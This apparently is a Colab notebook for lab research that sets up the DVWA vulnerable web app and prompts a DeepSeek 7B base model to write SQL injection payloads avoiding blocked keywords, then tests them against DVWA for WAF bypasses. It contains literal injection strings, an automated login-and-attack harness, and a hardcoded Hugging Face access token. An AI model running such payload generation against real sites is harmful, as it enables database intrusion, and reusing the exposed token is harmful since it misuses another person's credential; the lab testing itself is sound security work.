# WAF Bypass - Colab Quick Runner (DeepSeek 7B Base, no adapter)

This notebook helps you:
- Spin up DVWA quickly on Colab (temporary, for a few minutes).
- Load `deepseek-ai/deepseek-llm-7b-base` in 4-bit for inference.
- Generate SQLi payloads and test them against DVWA endpoints.
- Optionally upload a JSONL dataset to batch-test.

Notes:
- Runtime is ephemeral. Restarting loses DVWA and model weights from RAM.
- For public access, this uses ngrok (optional). For internal requests, use 127.0.0.1.
- This is for lab use only. Do not target systems you do not own or control.


In [None]:
# Check GPU and install dependencies
!nvidia-smi || echo 'No GPU detected'
!pip -q install --upgrade pip
!pip -q install transformers==4.42.3 accelerate==0.30.1 bitsandbytes==0.43.1 peft==0.11.1 trl==0.9.6 datasets
!pip -q install httpx pyyaml sentencepiece
import os, torch, transformers
print(torch.cuda.get_device_name(0) if torch.cuda.is_available() else 'CPU')
print(transformers.__version__)


In [None]:
# Set your Hugging Face token (paste then run)

import os
os.environ['HF_TOKEN'] = "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"
print('HF token set:', 'OK' if os.environ.get('HF_TOKEN') else 'MISSING')

In [None]:
# Load deepseek 7B base in 4-bit (no adapter)
from transformers import AutoTokenizer, AutoModelForCausalLM, BitsAndBytesConfig
import torch, os
model_name = 'deepseek-ai/deepseek-llm-7b-base'
bnb = BitsAndBytesConfig(
    load_in_4bit=True,
    bnb_4bit_quant_type='nf4',
    bnb_4bit_use_double_quant=True,
    bnb_4bit_compute_dtype=torch.float16,
)
tok = AutoTokenizer.from_pretrained(model_name, token=os.environ.get('HF_TOKEN', None))
if tok.pad_token is None: tok.pad_token = tok.eos_token
tok.padding_side = 'left'
model = AutoModelForCausalLM.from_pretrained(
    model_name,
    device_map='auto',
    quantization_config=bnb,
    torch_dtype=torch.float16,
    token=os.environ.get('HF_TOKEN', None),
)
model.eval(); print('Model loaded')


## DVWA on Colab - Quick & Dirty Setup


In [None]:
# 1) Install Apache + PHP + MariaDB
!apt-get -qq update
!apt-get -qq install -y apache2 php php-mysqli php-gd mariadb-server git > /dev/null
# 2) Start MariaDB
!service mysql start
# 3) Fetch DVWA
!rm -rf /var/www/html/*
!git clone -q https://github.com/digininja/DVWA.git /var/www/html/
# 4) Perms + DB
!chmod -R 777 /var/www/html/hackable /var/www/html/config
!mysql -e "CREATE DATABASE dvwa;"
!mysql -e "CREATE USER 'dvwa'@'localhost' IDENTIFIED BY 'p@ssw0rd';"
!mysql -e "GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa'@'localhost';"
!mysql -e "FLUSH PRIVILEGES;"
# 5) Config file
!cp /var/www/html/config/config.inc.php.dist /var/www/html/config/config.inc.php
!sed -i "s/'db_user' ] = ''/'db_user' ] = 'dvwa'/g" /var/www/html/config/config.inc.php
!sed -i "s/'db_password' ] = ''/'db_password' ] = 'p@ssw0rd'/g" /var/www/html/config/config.inc.php
# 6) Start Apache
!service apache2 start
print('DVWA base services are up. Open /setup.php to initialize tables.')


In [None]:
# 7) Optional: public tunnel via ngrok
try:
    from pyngrok import ngrok
except Exception:
    import sys, subprocess
    subprocess.check_call([sys.executable, '-m', 'pip', 'install', '-q', 'pyngrok'])
    from pyngrok import ngrok
public_url = ngrok.connect(80)
public_url


Open the ngrok URL -> `/setup.php` -> Create/Reset Database -> then login with `admin:password`.
If you prefer headless testing (no browser), the code below logs in and runs requests directly.


In [None]:
# DVWA helpers (headless)
import requests, re
DVWA_BASE = 'http://127.0.0.1'  # or str(public_url) if using ngrok
DVWA_LOGIN = f'{DVWA_BASE}/login.php'
DVWA_SQLI = f'{DVWA_BASE}/vulnerabilities/sqli/'

def dvwa_login(session: requests.Session, username='admin', password='password') -> bool:
    r = session.get(DVWA_LOGIN, allow_redirects=True, timeout=15)
    m = re.search(r"user_token' value='([a-f0-9]{32})'", r.text, re.I)
    if not m: return False
    token = m.group(1)
    data = {'username': username, 'password': password, 'user_token': token, 'Login': 'Login'}
    r = session.post(DVWA_LOGIN, data=data, allow_redirects=True, timeout=15)
    return 'login.php' not in str(r.url)

def test_payload(session: requests.Session, payload: str) -> str:
    r = session.get(DVWA_SQLI, params={'id': payload}, allow_redirects=True, timeout=15)
    if r.status_code == 403: return 'blocked'
    txt = r.text.lower()
    sql_err = [
        'you have an error in your sql syntax', 'warning: mysql_', 'sqlstate{', 'incorrect syntax near',
        'fatal error: uncaught pdoexception', 'sqlite error', 'syntax error at or near'
    ]
    for p in sql_err:
        if p in txt: return 'sql_error_bypass'
    return 'passed'

def probe_blocked(session: requests.Session) -> list:
    tests = {"' OR 1=1--": 'OR', "' UNION SELECT 1,2--": 'UNION', "' AND 1=1--": 'AND'}
    blocked = []
    for p, name in tests.items():
        r = session.get(DVWA_SQLI, params={'id': p}, allow_redirects=True, timeout=10)
        if r.status_code == 403: blocked.append(name)
    return blocked

print('DVWA helpers ready')


In [None]:
# Simple prompt + generation
import torch, re

def build_prompt(blocked_keywords, one=False):
    if one:
        return (
            "You are a helpful AI assistant.\n",
            f"Generate exactly one MySQL SQL injection test payload.\n"
            f"Avoid keywords: {blocked_keywords}.\n",
            "Output format:\n"
            "Payload: <payload>\n"
            "Reasoning: <1-2 sentences>\n",
        )
    return (
        "You are a helpful AI assistant.\n",
        f"Generate 8 distinct MySQL SQL injection test payloads.\n"
        f"Avoid keywords: {blocked_keywords}.\n",
        "Output each as: Payload: <payload>\n"
        "Reasoning: <1-2 sentences>\n",
    )

def extract_payloads(text: str) -> list:
    # Regex: Payload: <payload>
    return [m.strip() for m in re.findall(r"Payload:\s*(.*)", text)]

def generate_payloads(blocked_keywords, num_return_sequences=1, max_new_tokens=256):
    prompt = "".join(build_prompt(blocked_keywords, one=(num_return_sequences == 1)))
    inputs = tok(prompt, return_tensors="pt").to(model.device)
    with torch.no_grad():
        out = model.generate(
            **inputs,
            max_new_tokens=max_new_tokens,
            do_sample=True,
            temperature=0.8,
            top_p=0.9,
            pad_token_id=tok.eos_token_id,
            num_return_sequences=num_return_sequences,
        )
    texts = tok.batch_decode(out, skip_special_tokens=True)
    payloads = []
    for t in texts:
        payloads.extend(extract_payloads(t))
    return sorted(list(set(payloads)))

print("Generation utils ready")


In [None]:
# Smoke test: login, probe, generate 5 payloads, test them
import requests
s = requests.Session()
ok = dvwa_login(s)
print('Login OK:', ok)
blocked = probe_blocked(s)
print('Blocked keywords:', blocked)
payloads = generate_payloads(blocked, num_return_sequences=5, max_new_tokens=200)
print('Generated:', len(payloads))
results = []
for p in payloads:
    res = test_payload(s, p)
    results.append((p, res))
results[:5], {'blocked': sum(r=='blocked' for _,r in results), 'passed': sum(r=='passed' for _,r in results), 'sql_error_bypass': sum(r=='sql_error_bypass' for _,r in results)}


## Optional: Upload JSONL and batch-test


In [None]:
from google.colab import files
up = files.upload()  # upload your JSONL file (one obj per line)
jsonl_path = list(up.keys())[0] if up else ''
print('Uploaded:', jsonl_path)


In [None]:
# Batch-test: For each line in JSONL, generate 1 payload and test
import json
def iter_jsonl(path):
    with open(path, 'r', encoding='utf-8', errors='ignore') as f:
        for line in f:
            line=line.strip()
            if not line: continue
            yield json.loads(line)

s = requests.Session(); ok = dvwa_login(s)
assert ok, 'Login failed; open /setup.php and initialize tables first'
blocked = probe_blocked(s)
print('Blocked keywords:', blocked)
stats = {'blocked':0,'passed':0,'sql_error_bypass':0,'total':0}
samples = []
for i, row in enumerate(iter_jsonl(jsonl_path)):
    if i >= 50: break  # limit for quick run
    payloads = generate_payloads(blocked, num_return_sequences=1, max_new_tokens=160)
    if not payloads: continue
    p = payloads[0]
    res = test_payload(s, p)
    stats[res]+=1; stats['total']+=1
    if len(samples)<5: samples.append((p,res))

stats, samples
